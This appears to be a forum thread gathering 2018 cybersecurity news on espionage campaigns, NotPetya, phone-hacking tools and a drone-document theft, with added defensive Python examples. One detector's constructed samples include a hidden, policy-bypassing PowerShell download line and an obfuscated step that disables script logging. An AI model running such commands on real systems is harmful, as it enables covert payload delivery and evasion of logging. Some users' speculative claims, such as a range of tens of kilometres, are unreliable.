Cyber thread: network espionage, tracking of mobile phones and WLANs, hacking, viruses, DoS etc

Now, however, the group is targeting financial organizations in Russia, and, of concern, biological and chemical threat prevention laboratories in Europe and Ukraine.

New Victim Profiles

Kaspersky Lab researchers examined some of the phishing lures to find out more about the targets, based on decoy documents, email subjects and file names. For instance, two of the decoy documents reference the Salisbury poison attack on Russian double agent Sergey Skripal and his daughter in London earlier this year.

One of the documents observed in the attacks references the nerve agent used to poison them; another references Spiez Convergence, a biochemical threat research conference held in Switzerland. The sponsor, Spiez Laboratory, was involved in the Skripal attack investigation.

“Further analysis of other related files suggests that the target of [yet another] document is working in the biological and epizootic threat prevention field,” Kaspersky researchers said in a post published Tuesday.

The lures also suggest that they were “probably prepared with the help of a native [Russian] speaker and not automated translation software,” researchers noted. For instance, one of the documents included a lure image with perfect Russian language in it, and the Cyrillic messages inside this and previous documents are in perfect Russian.

There are ties to the Ukraine too. For instance, once the user enables the macro, a decoy document is displayed, taken very recently from the official website of the Ukrainian Ministry of Health.

These could all be red herrings however – during the Pyeongchang attacks, Olympic Destroyer planted several false flags meant to confuse and misdirect attribution efforts. Various aspects were calculated to make the threat actor look like the Lazarus APT, which is widely believed to be associated with North Korea.

All of this makes it difficult to determine whoever is behind the latest Olympic Destroyer attacks.

“The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e., a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets,” researchers noted. “This could also be a result of cyberattack outsourcing, which is not uncommon among nation-state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this.”

Kaspersky Lab said that various TTPs could point to the Sofacy/Fancy Bear APT, a well-known Russian-speaking gang, but that it can only assess this with “low-to-moderate confidence.”

A Sophisticated Actor

In any event, this shadowy group behind the attacks uses a sophisticated level of expertise when it comes to the kill chain. The infection procedure relies on multiple different technologies, mixing VBA code, Powershell and MS HTA, with JScript – and is unique enough to act as further evidence for a relationship with the Olympics attack.

It starts with an embedded malicious macro in the spear-phishing document that is heavily obfuscated, the researchers noted, with a randomly-generated variable and function name. Its purpose is to execute a Powershell command.

“This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign,” the researchers said. “The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings, such as the command and control (C2) server address. There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.”

This Powershell script also disables logging in order to avoid leaving traces, and it goes on to decrypt additional payloads downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key – another technique used in the Olympics attack.

After another round of Powershell scripting and decrypting, the final payload is the Powershell Empire agent, which allows fileless control of the compromised hosts for lateral movement and information-gathering.

Spy Today, Destroy Tomorrow

The fact that the payload is a cyberespionage tool suggests that the actors are in a reconnaissance phase. Unfortunately, this could be a prelude to something much worse, if past is prologue.

“Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm,” the researchers said. “The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.”

That larger cyber-sabotage stage was meant to “destroy and paralyze infrastructure of the Winter Olympic Games, as well as related supply chains, partners and even venues at the event location.” It’s possible that the same pattern will play out here.

Kaspersky Lab is advising all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

“It’s no surprise that the actors behind successful cyberattacks that disrupted the Pyeongchang Olympics are now targeting other organizations,” said Aaron Higbee, CTO and co-founder of Cofense (formerly PhishMe), via email. “Regardless of the sector being targeted, phishing is a serious threat because it works, often making their way past stacks of expensive technology layers and email gateways to land in an unsuspecting user’s inbox. In this case, it appears that the attackers are likely using spear-phishing emails that look like they’re coming from a trusted source, a tactic our research has shown to be particularly successful.”

https://threatpost.com/olympic-destroyer-returns-to-target-biochemical-labs/132929/
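The kill chain the article describes leaves traces in PowerShell script-block logs (Event ID 4104 on a host where script-block logging is enabled): format-string and array-index reordering of the Invoke-Obfuscation kind, attempts to tamper with the logging policy, hidden-window and policy-bypass switches, and a second-stage fetch from OneDrive. The following is an added triage example written for this thread; it is not code from the article, from Kaspersky or from any of the tools named. The regexes are this example's own heuristics rather than signatures from the report, and the log lines are constructed samples.

```python
import re

# Heuristics for the traits the article describes. These patterns are this
# example's own assumptions about how such a script appears in a script-block
# log, not signatures taken from the Kaspersky report.
FORMAT_STRING = re.compile(r"""(['"])((?:\{\d+\}\s*)+)\1\s*-f\b""")
PATTERNS = {
    # char-array indexing joined back into a string, e.g. ('cba'[2,1,0] -join '')
    "index_join": re.compile(
        r"\[\s*-?\d+(?:(?:\s*,\s*-?\d+)+|\s*\.\.\s*-?\d+)\s*\]\s*-join", re.I),
    # references to the PowerShell logging policy keys or values
    "logging_tamper": re.compile(
        r"ScriptBlockLogging|LogPipelineExecutionDetails|"
        r"Policies\\Microsoft\\Windows\\PowerShell", re.I),
    # hidden window and execution-policy bypass switches
    "hidden_exec": re.compile(
        r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass", re.I),
    # second-stage fetch from OneDrive, as in the campaign described above
    "onedrive_fetch": re.compile(r"onedrive\.live\.com", re.I),
}

# Constructed script-block texts standing in for the ScriptBlockText field of
# real 4104 events. None of these is a real sample from the campaign.
SAMPLE_SCRIPT_BLOCKS = [
    # benign: routine log housekeeping
    r"Get-ChildItem C:\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item",
    # suspicious: out-of-order format string, hidden window, policy bypass,
    # OneDrive download (placeholder URL)
    r"""powershell -w hidden -ep bypass -c "$m=('{2}{0}{1}' -f 'wnloadSt','ring','Do'); (New-Object Net.WebClient).$m('https://onedrive.live.com/download?cid=CONSTRUCTED')" """,
    # suspicious: reversed char array rebuilt with -join, then the logging
    # policy key is touched (remainder elided in this constructed sample)
    r"""$n=('gniggoLkcolBtpircS'[-1..-18] -join ''); Set-ItemProperty ("HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\" + $n) -Name ("Enable" + $n) # elided""",
    # benign: an in-order format string is ordinary PowerShell, not reordering
    r"Write-Host ('{0} {1}' -f 'disk', 'usage')",
]


def scan_script_block(text):
    """Return the names of the suspicious traits present in one script block."""
    found = []
    # A format string only counts as obfuscation when its slots are out of order.
    for m in FORMAT_STRING.finditer(text):
        slots = [int(n) for n in re.findall(r"\d+", m.group(2))]
        if slots != sorted(slots):
            found.append("format_string_reorder")
            break
    for name, pattern in PATTERNS.items():
        if pattern.search(text):
            found.append(name)
    return found


def triage(blocks, min_traits=2):
    """Map index -> traits for blocks showing at least min_traits traits.

    Requiring two independent traits keeps a lone '-w hidden' in an admin
    script from raising an alert on its own.
    """
    hits = {}
    for i, text in enumerate(blocks):
        traits = scan_script_block(text)
        if len(traits) >= min_traits:
            hits[i] = traits
    return hits


if __name__ == "__main__":
    for i, traits in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"block {i}: {', '.join(traits)}")
```

Feed it the ScriptBlockText of your own 4104 events (or the equivalent field from an EDR) rather than the constructed list; the threshold and the pattern set are the knobs to tune against your baseline of legitimate automation.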
 

The Israelis' Unit 8200 wardriving van on steroids. 500 m is propaganda. The real range is very likely tens of kilometres, if not more.

Sometimes it’s hard to tell if something is real or was dreamed up by a Batman villain. That’s the case with the WiSpear iPhone hacking van.

This tool supposedly can be used to install malware on an iOS or Android device from a third of a mile away.

WiSpear allegedly forces an iPhone to connect to its Wi-Fi access point. Then it uses man-in-the-middle attacks to snoop on the data being transferred to and from the iOS device. The company behind this hacking tool on wheels says it can also install malware on the device, according to Forbes.

Multiple computers can be attacked at once from the WiSpear. Allegedly, a user's iPhone and Mac can be hacked simultaneously. Not to be left out, the hacking tool also works on Android-based phones.
https://www.cultofmac.com/557663/wispear-hacks-iphones-500m-away/
 
The Israelis' Unit 8200 wardriving van on steroids. 500 m is propaganda. The real range is very likely tens of kilometres, if not more.

https://www.cultofmac.com/557663/wispear-hacks-iphones-500m-away/
Now for a bit more realism and a bit less scaring of people.

If that works the way they claim, i.e. it forces the phone to drop its current Wi-Fi and connect to the van's Wi-Fi, I can tell you straight away that you won't be hacking any phones even from a couple of hundred metres away. Simply because phone Wi-Fi antennas are small and their transmit power is limited. It's also quite a bold boast to claim you can drop malware onto iPhone and Android phones; that would require that outfit to know several zero-day vulnerabilities. It may well be so, but usually people don't shout about those much.
 
that would require that outfit to know several zero-day vulnerabilities.

Wardriving doesn't need zero-day vulnerabilities. The methods and tricks for harvesting keys are known and can easily be found in, for example, Kali Linux's pentest libraries. Espionage is that van's primary job, not dropping malware.
 
Today (27 June) marks the first anniversary since the NotPetya ransomware ravaged a range of businesses from shipping ports and supermarkets to ad agencies and law firms.


Once in a system, the code sought to encrypt files and destroyed master boot records, leaving infected Windows machines useless. The malware spread using the US National Security Agency's leaked EternalBlue exploit, which was also abused by WannaCry months earlier.


Updates of MeDoc, Ukraine's most popular accounting software, covertly tainted with NotPetya by hackers, distributed the ransomware payload. Once installed, the backdoored code spread like wildfire across flat networks, scrambling files as it went. The effects were devastating. Western intel agencies subsequently blamed Russia for the attack.


Most victims were based in Ukraine, but several global corporations were also infected – including shipping giant Maersk, advertising firm WPP, pharmaceutical outfit Merck, and FedEx's TNT Express division.


FedEx estimated that NotPetya cost it $300m in lost business and cleanup. Maersk also said it was out of pocket by the same amount as a result of the outbreak. Reckitt Benckiser – the firm behind the Dettol and Durex brands – said the attack cost it £100m ($136m). Other victims included Russian oil company Rosneft and multinational law firm DLA Piper.


Mikko Hypponen, chief research officer at Finnish infosec firm F-Secure, told El Reg: "I believe that NotPetya was the single most expensive computer security incident in history. I believe it created bigger losses than any malware outbreak ever, or any hacking incident ever, or any data leak ever. It was historic."


NCC Group rebuilt the malware without the destructive element to test what a real-life attack would look like on an organisation's infrastructure. The exercise showed how quickly malware of this type was capable of spreading across poorly segmented networks.


BlackBerry CTO Charles Eagan reckoned organisations have still not learnt from the mistakes WannaCry and NotPetya exposed.


"Just weeks after WannaCry crippled the NHS and broader industries, NotPetya hit," Eagan said. "One year on from NotPetya, it seems lessons still haven't been learned.


"A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains."
https://www.theregister.co.uk/2018/06/27/notpetya_anniversary/
 
Lithuania's proposal that the European Union create an international cyber-force has been endorsed, and the effort already has seven countries on board.

The Baltic country announced yesterday that EU member states have agreed to create “EU Cyber Rapid Response Force” teams, with a declaration of intent signed in Luxembourg yesterday by the EU Foreign Affairs Council.

Minister of National Defence Raimundas Karoblis said international efforts are needed because of the cross-border nature of modern infosec threats (except, of course, he said “cyber”).

As well as Lithuania, which leads the project, participants currently include Croatia, Estonia, France, Finland, the Netherlands, Romania, and Spain. Belgium, Germany, Greece, and Slovenia are observers, and another four countries are expected to sign on by the end of the year.

Karoblis said to take part, countries will need an existing “standing cyber security unit” able to help investigate serious incidents.

In the first phase of the project, participating countries will assess the technical and legal basis of the cyber team operations, and wrangle about project financing.

The second phase, the announcement said, will involve joint exercises, and assess the prospects that members could create mutual cyber defence tools.
https://www.theregister.co.uk/2018/06/27/eu_cyber_force/
 

US security company FireEye has denied a claim aired in a new book that it hacked into laptops owned by Chinese military hackers.

It's common knowledge that prior to its acquisition by FireEye, the security concern Mandiant brought the Chinese operation known as APT1 undone. In its 2013 report, the company attributed espionage against 141 companies in 20 industries to APT1 in attacks dating back to 2006.

Its report said APT1 operated closely to People's Liberation Army Unit 61398, and had similar “mission, capabilities, and resources”.

In 2015, responding to many requests from the USA, China arrested a number of hackers over the campaigns.

Mandiant kept its methods secret, and that left room for David Sanger, a New York Times correspondent, to make the sensational claim that it was a “hack-back” operation that included spying on the Chinese hackers via webcams in their compromised laptops. The allegation appears in his new book, The Perfect Weapon.

Not so, says FireEye. The company's refutation, published here, said “hack-back” techniques weren't used in Mandiant's exposure of APT1.
https://www.theregister.co.uk/2018/06/27/fireeye_we_didnt_hack_back_against_apt1/
 
I suppose this too has to be counted as state activity. ROFL.

has accused its enemy Hamas of building fake dating apps to woo soldiers into downloading malicious software on to their mobile phones.

Hundreds of Israel Defence Forces (IDF) troops were contacted via social media this year and asked to download one of two fake dating apps, WinkChat and GlanceLove, according to an official in the army’s intelligence directorate.

Once the bogus app was installed, it granted its creators the ability to see the owner’s location and contact list and to use the phone as a listening device and video camera.

“Whatever you can do with your phone, the malicious content can do,” the official said at a briefing to journalists on Tuesday, adding the operation targeted Android phones.

The soldiers were contacted via phony Facebook accounts, often with the stolen identities of young women, asking to chat on WhatsApp. They were then sent links to the apps, which were listed on the Google Play store and have since been removed.

He said a third sham app, Golden Cup, promoted as a World Cup live scores and fixtures aid, was advertised to soldiers in Hebrew on Facebook. The app streamed videos of impressive goals from previous tournaments and listed details about each team. “It was actually a very good one,” the official said.

The IDF said the hacks had failed to cause any “security damage at all” and said most soldiers and others working for the army who were approached to download the app had refused and reported the incident to their commanders.

However, it conceded that some soldiers had downloaded the apps. While it did not provide an exact figure, the military said “less than 100” installed at least one program on their phones.

The IDF, which had been monitoring the hack for months, called its operation Broken Heart as it claimed the honeytrap had failed to seduce its soldiers effectively. It said both serving men and women were targeted.

Hamas attempted a similar strategy in January 2017 but used less advanced apps sold as social chat platforms, according to the military.

As part of a new awareness programme to protect its secrets, the IDF has started to send its own fake messages to soldiers that ask them to click on a link. If the soldier opens the link, a warning pops up and they have to meet their commanding officers to debrief on online security.

An official for Hamas, the Palestinian militant and political faction that runs the Gaza Strip, declined to comment.
https://www.theguardian.com/world/2...ated-fake-dating-apps-to-hack-soldiers-phones
 
The Air Force issued a formal proposal earlier this month for the Department of Defense’s long-awaited cyber weapon system, known as the Unified Platform, sources tell Fifth Domain.

DoD officials have said the Unified Platform is one of U.S. Cyber Command’s largest and most critical acquisition programs to date. Industry officials have said it is necessary to conduct cyber operations and is critical to national security.
https://www.fifthdomain.com/dod/cyb...r-command-moves-closer-to-a-major-new-weapon/

But details on what the Air Force, which issued the request on behalf of Cyber Command, wants in a Unified Platform are scarce.

Sources told Fifth Domain a formal request for proposal was released through the General Services Administration’s premier enterprise Alliant Governmentwide Acquisition Contract vehicle, which “provides flexible access to customized IT solutions from a large, diverse pool of industry partners … [and] allows for long-term planning of large-scale program requirements.”

Under this model, GSA completes much of the initial contracting legwork and, in this case, allows the Air Force to focus on the specific technical requirements, sources said. Companies compete to be eligible for task orders under the Alliant contract and then GSA selects contractors who compete against each other for individual task orders on the final program. This means only vetted companies would work on the program.

Alliant is also designed to streamline contracts for IT projects only, eschewing some of the documentation and financials in typical contracts enabling faster awards.

The Unified Platform proposal was only released to companies on the contract about two weeks ago, sources said, and is due in mid-July.

Today, each of the individual services uses its own disparate systems, many of which are not linked together. The spokesman added that efforts are underway to review and consolidate existing service and Cyber Command’s platforms.

Unified Platform seeks to take the best of breed of these and provide all cyber warriors a consolidated system.

“In concert with US Cyber Command and all Services, the Air Force as Executive Agent is directing development and deployment to ensure timely and relevant full-spectrum capabilities for our cyber warriors,” an Air Force spokeswoman said.

An Air Force spokeswoman said that the Air Force’s Life Cycle Management Center will serve as the system integrator and will lead a multi-contractor, agile development/operations effort to launch and expand the Unified Platform.

Currently, Lockheed Martin, Northrop Grumman, Raytheon and Booz Allen Hamilton are known to be competing for the contract. Sources said other companies may also be considering a bid.
 
As someone interested in, and writing about, all the hybrid-warfare chatter, I have to wonder out loud what is going on when many of my computer's functions have slowed to about a hundredth of the usual, and a few days ago my eldest child's phone showed an absolutely shocking change in power consumption. Something gobbled up a half-full battery in a few hours.

And there are all sorts of other oddities with communication devices, sometimes more and sometimes less. Usually more.
 
Something gobbled up a half-full battery in a few hours.

Hard to say without examining the content itself. An attack doesn't necessarily show up anywhere as a power spike, but a brute-force attack is another matter. I'd sooner believe several apps were running in the background at the same time and the multitasking drained the battery.

that many of my computer's functions have slowed to about a hundredth of the usual

You've got a worm or something similar infecting it. A sudden slowdown and overall sluggishness is always a sign that no processor time is left for the user, and that shows up as sluggishness. In other words, someone else owns your machine and in the worst case is using it to mine bitcoin while you're left paying the bill. But it could be many other things worth wondering about.
 
Privacy is going to be the most critical topic for technology for the next 10, 20 or even 30 years.


Because of the ubiquity of the internet and devices like our smart phones and, of course, the enormous amounts of money that companies like Google and Facebook have figured out how to make from selling our personal information, it is increasingly easy and profitable to infringe on previous privacy norms.


If the Supreme Court continues down its current path – imposing and expanding controls over what tech can do – it will slowly throttle the commercialization of private data. And that will have big knock-on impacts on the tech industry and broader society. But if the court starts moving down a more free-market route, that could all change.



Kethledge was a member of the court that decided that cell phone data on a third party's servers is not covered by the Fourth Amendment – a decision that the Supreme Court overturned last month in its Carpenter decision (which was 5-4).

He wrote: "The Supreme Court has long recognized a distinction between the content of a communication and the information necessary to convey it." That is a viewpoint that will have privacy advocates worried.

Kavanaugh is a reliably pro-corporate judge and so while he appears not to have addressed privacy issues head on, you can expect him to see the value in the dollar over the principle i.e. bye-bye privacy.

Again, the likely positions of Hardiman and Barrett are very hard to infer based on the decisions that they have made. It's worth noting that Hardiman tends to have more of a heart, something that likely comes from his background – he was the first in his family to attend college and he worked as a cab driver to pay his way through law school.

Barrett is cold by comparison, actively arguing that a judge's personal views should not impact their decisions – although that may itself have been because she was being criticized for her strong Catholic beliefs (it's all about abortion in America).

When it comes to privacy issues, the arguments for it are likely to depend on people recognizing the impact that it can have on individuals, particularly the most vulnerable in society. So, if we were to hazard a wild guess, Hardiman would be pro-privacy and Barrett pro-corporate and hence anti-privacy.


To sum up: things don't look good if you think privacy should trump corporate profits.

Spying

The enormous upheavals that were sparked by Edward Snowden's revelations of mass surveillance have died down. After all, Congress scaled some back and reapproved some others.

But we have a niggling suspicion that spying on individuals is going to crop up again in the next decade or so, especially given the entirely unsettled issue of encryption backdoors and access to information.

Congress is absolutely terrified of this issue because it's like being stuck between a rock and a hard place – the security services on one side and voters on the other.

The intelligence services do everything in their power to keep the issue of mass surveillance and spying out of the limelight but with so many issues still unresolved it is very possible it will need additional legal clarification, and that in turn would ultimately mean the Supreme Court weighing in.

Kavanaugh is the person with the most history in this context and he is firmly pro-NSA, even writing an effusive defense of its mass surveillance programs. "The government's metadata collection program is entirely consistent with the Fourth Amendment," he wrote, adding that: "Critical national security need outweighs the impact on privacy."

Since any challenge to spying program is likely to focus on the Fourth Amendment then Kethledge's view that cell phone data held on third-party servers was not covered by it also points to a pro-NSA position.

Hardiman is, again, the most likely to push back against government spying. He backed a lawsuit that took issue with the NSA's surveillance programs and claimed that someone's personal docs held online may have been wrongly swept up by the spy agency.

And it's hard to know where Barrett stands. She tends to stand with the current authorities' viewpoint but also makes noises about challenging old laws. Our guess would be that she will go with whatever the security services insist is true.

The upshot: only Hardiman is likely to stand up to government spying programs if they make their way to the Supreme Court.
https://www.theregister.co.uk/2018/07/09/supreme_court_justice/
 
The number of organisations affected by cryptomining malware in the first half of 2018 ramped up to 42 per cent, compared to 20.5 per cent in the second half of 2017, according to a new report from Check Point.

The top three most common malware variants seen in the first half of 2018 were all cryptominers: Coinhive (25 per cent); Cryptoloot (18 per cent); and JSEcoin (14 per cent). All three perform online mining of the cryptocurrency – often without a user's knowledge, much less consent – when a surfer visits a web page that harbours cryptomining code.

Locky was the leading ransomware variant hitting organisations globally in the first six months of 2018, ahead of WannaCry and Globeimposter. Locky spreads mainly via spam emails containing a downloader, disguised as a Word or Zip attachment. WannaCry used a Windows SMB exploit called EternalBlue to spread while Globeimposter is distributed by spam campaigns, malvertising and exploit kits.

Cloud infrastructures appeared to be a growing target among hackers during the first six months of this year. Check Point further noted an increase in the number of malware variants targeting multiple platforms (mobile, cloud, desktop etc).

"Up until the end of 2017, multi-platform malware was witnessed in only a handful of occasions," the security researchers said, "but, as predicted, the rise in the number of consumer-connected devices and the growing market share of operating systems which are not Windows has led to an increase in cross-platform malware. Campaign operators implement various techniques in order to take control over the campaigns' different infected platforms."

There were several incidences of mobile malware that originated from the supply chain. Infected devices are being sold to consumers so that new Android smartphones come pre-pwned with malicious code. Mobile malware is increasingly disguised as genuine applications on app stores. These nasties include banking trojans, adware and sophisticated remote access trojans (RATs), Check Point added.

Check Point's Cyber Attack Trends: 2018 Mid-Year Report is based on threat data collected between January and June 2018.
https://www.theregister.co.uk/2018/07/12/malware_sitrep/

I don't believe this #MiningWar is going away any time soon, nor do I believe we've seen the most drastic stunts yet. #Wardriving, #RainbowTables #Phishing #MalWaretus are so yesterday, but they've all been adapted to today's operations.
 
On June 1, Recorded Future’s Insikt Group was monitoring underground criminal activity when it identified a newly registered member of a hacking forum, attempting to sell highly sensitive documents about the U.S. military MQ-9 Reaper drone. Given that it’s incredibly rare for criminal hackers to attempt to sell military documents on an open market, the firm looked into the offering further. It was able to contact the hacker and verify the veracity of the documents, opening up a further dialog with the perpetrator.

In doing so, it uncovered the actor’s tactics: He or she exploited vulnerable Netgear routers with improperly set up FTP login credentials to gain access to an unidentified officer’s information.
In an analysis of the hack published Tuesday, Recorded Future said that the bad actor used the Shodan search engine to scan large segments of the internet for Netgear DGN2200v4 modem routers with weak passwords that use a standard, open port 21. From there, thanks to a command execution and FTP insecure root directory security vulnerability, hackers who have an unpatched router’s administrative password can inject OS commands that can be used to backdoor the router. They can then use that access to intercept network traffic flowing through it, including file attachments.

It’s a sadly all-too-common opening: Despite it being two years since the Netgear vulnerability was first acknowledged, the problem remains widespread, the firm said. During recent research, Recorded Future identified more than 4,000 routers susceptible to the attack.

Recorded Future went on to say that the hacker used this tactic to infiltrate the computer of a captain at 432d Aircraft Maintenance Squadron Reaper AMU OIC, stationed at the Creech AFB in Nevada. There, he or she “stole a cache of sensitive documents, including Reaper maintenance course books and the list of airmen assigned to Reaper AMU,” the firm noted. It added, “While such course books are not classified materials on their own, in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts.”

Aside from the drone information, the actor also revealed that he or she is in possession of a second dataset, including “the M1 Abrams maintenance manual, a tank platoon training course, a crew survival course and documentation on improvised explosive device (IED) mitigation tactics,” according to Recorded Future. While the source isn’t known, these appear to be stolen from the Pentagon or from a U.S. Army official, the firm said.

“The fact that a single hacker with moderate technical skills was able to identify several vulnerable military targets and exfiltrate highly sensitive information in a week’s time is a disturbing preview of what a more determined and organized group with superior technical and financial resources could achieve,” Recorded Future said.

The exfiltration of such sensitive military secrets is not as uncommon as one would hope. This latest news comes on the heels of a revelation last month that an unidentified hacker was trying to sell purported U.S. military documents containing submarine warfare information. The stolen data included “secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020,” American officials said.

“Modern warfare is inherently dependent upon computing, from drones, to missiles, to communications with troops on the ground,” said Tom Kellermann, chief cybersecurity officer at Carbon Black, via email. “Nation-states like China, Russia, Iran and Syria are escalating their cyberattacks against U.S. personnel through cyberspace. This breach represents an ominous trend of unmasking those who man the tip of America’s spear – drone pilots of the U.S. Air Force. The DoD must modernize its cybersecurity posture given the rapid evolution and coordination of enemies in cyberspace.”

Aside from illustrating a pervasive problem in the level of government security hygiene, this latest incident also points out potentially poor judgement on a more individual level.

“Does the USAF use Wi-Fi connected to their NIPRNet?/ DoDIN? I have to believe the answer is a definitive no. As such, it may have been the case someone had the documents on an off-premise device connected to a home or other open Wi-Fi network,” Sherban Naum, senior vice president of corporate strategy and technology at Bromium, told Threatpost via email. “The idea that it was a two-year-old vulnerability and not patched tells me it may have been a personal Wi-Fi access point left unmanaged/unpatched.”

While preventing unauthorized data movement and extraction is a challenge for the DoD, simply due to the vast number of users, contractors and programs at play, there are some best practices to follow, Naum added. For one, the main mitigation for the Netgear hack is simple: Changing the router’s administrative password.

Also, “high-value asset (HVA) consolidation is a key movement within the DoD, with Ron Ross at NIST leading the discussions,” he explained. “By securing DoD HVAs, they can then focus on connections into the HVA, limiting access and attesting both the device and user prior to allowing them onto the HVA fabric. By limiting access to and controlling data flow from the HVA to the user’s local device, the DoD can limit the amount of data loss.”
https://threatpost.com/hacker-compromises-air-force-captain-to-steal-sensitive-drone-info/133915/
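The risk profile in the article is a combination of three things: FTP (port 21) reachable from the internet, a factory or otherwise weak administrative password, and firmware that predates the fix for a vulnerability that had been public for two years; the mitigation named is changing the administrative password. The following is an added example for this thread, not code from Recorded Future, Netgear or Threatpost: a small Python audit that evaluates router records against that profile. The inventory, the default-credential list and the firmware cut-off date are constructed for the example (the actual advisory date is not on the page); the model string DGN2200v4 is the one the article names.

```python
from dataclasses import dataclass
from datetime import date

# Factory credentials to compare against: constructed placeholders for this
# example, not values taken from the article or from any vendor manual.
DEFAULT_CREDENTIALS = {("admin", "password"), ("admin", "admin")}
# Assumed cut-off: DGN2200v4 firmware built before this date is treated as
# lacking the fix the article refers to. The real advisory date is not on the page.
ASSUMED_FIX_DATE = date(2017, 1, 1)
AFFECTED_MODEL = "DGN2200v4"


@dataclass
class RouterRecord:
    hostname: str
    model: str
    admin_user: str
    admin_password: str
    wan_open_ports: set      # ports reachable from the internet side
    firmware_date: date


def weak_password(user, password):
    """Default credentials, short passwords or single-class passwords all count as weak."""
    if (user, password) in DEFAULT_CREDENTIALS:
        return True
    if len(password) < 12:
        return True
    classes = sum(
        1 for test in (str.islower, str.isupper, str.isdigit)
        if any(test(c) for c in password)
    )
    return classes < 3


def assess_router(r):
    """Return the list of findings for one router, in a fixed order."""
    findings = []
    if 21 in r.wan_open_ports:
        findings.append("ftp_exposed_on_wan")
    if weak_password(r.admin_user, r.admin_password):
        findings.append("weak_or_default_admin_password")
    # The firmware check is only meaningful for the model the article names;
    # other models would need their own vendor cut-off dates.
    if r.model == AFFECTED_MODEL and r.firmware_date < ASSUMED_FIX_DATE:
        findings.append("firmware_predates_fix")
    return findings


def matches_article_profile(r):
    """True when all three conditions from the article hold at once."""
    return set(assess_router(r)) >= {
        "ftp_exposed_on_wan",
        "weak_or_default_admin_password",
        "firmware_predates_fix",
    }


# Constructed inventory: one router matching the full profile, one that has
# had its password changed and FTP closed, and one of another model that
# still exposes FTP with factory credentials.
CONSTRUCTED_INVENTORY = [
    RouterRecord("home-gw-1", "DGN2200v4", "admin", "password", {21, 80}, date(2016, 3, 10)),
    RouterRecord("home-gw-2", "DGN2200v4", "admin", "Tq7!mV2p#x9Lr", {443}, date(2018, 2, 20)),
    RouterRecord("branch-gw", "OTHER-MODEL", "admin", "admin", {21}, date(2016, 5, 1)),
]


def audit(inventory):
    """Map hostname -> findings for every router that has at least one finding."""
    return {r.hostname: f for r in inventory if (f := assess_router(r))}


if __name__ == "__main__":
    for host, findings in audit(CONSTRUCTED_INVENTORY).items():
        print(f"{host}: {', '.join(findings)}")
```

The audit is deliberately conservative: a router of another model with FTP open and a default password still gets two findings, it just does not get the firmware finding that the article's specific model would. Replace the inventory with an export from your own asset management and the cut-off date with the vendor's advisory date.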
 
Researchers have claimed the infamous APT28 Kremlin-linked hacking group was behind a new cyber-espionage campaign they believe was targeted at the Italian military.


Security researchers from the Z-Lab at CSE Cybsec spent the weekend unpicking a new malware-based cyber-espionage campaign allegedly conducted by APT28 (AKA Fancy Bear).


The multi-stage campaign features an initial dropper malware, written in Delphi, and a new version of the X-agent backdoor, a strain of malicious code previously linked to APT28.


One malicious library (dll) file associated with the campaign phones home to a command-and-control server with the name “marina-info.net”. This is a reference to the Italian Military corp, Marina Militare, according to the researchers.


"The dll that connect to 'marina-info.net' might be the last stage-malware that is triggered only when particular conditions occur, for example when the malware infects a system with an IP address belonging to specific ranges," claimed the researchers.


The Russian state-backed hackers may be targeting specific organisations including the Italian Marina Militare and its subcontractors, the researchers conclude. The targeting of Italian organisations during the summertime led the researchers to nickname the campaign "Roman Holiday".


Researchers from Z-Lab worked with independent researcher Drunk Binary (@DrunkBinary) on malware samples spotted in the wild and uploaded them to VirusTotal as they put together their analysis.


Further details on the malware samples analysed by CSE Cybsec, including the indications of compromise, are available in a report published by researchers at ZLab here (pdf).


https://www.theregister.co.uk/2018/07/16/apt28_italian_job/
 
Did anyone notice their mobile phone and WLAN acting up during Trump's and Putin's visit? I was around Kuusamo at the time and connections were at times extremely unstable.
 
Did anyone notice their mobile phone and WLAN acting up during Trump's and Putin's visit? I was around Kuusamo at the time and connections were at times extremely unstable.
Heat is enough for that. Warm air + high relative humidity, and WLAN gets partly blocked. High temperatures also affect 3G/4G connections.
 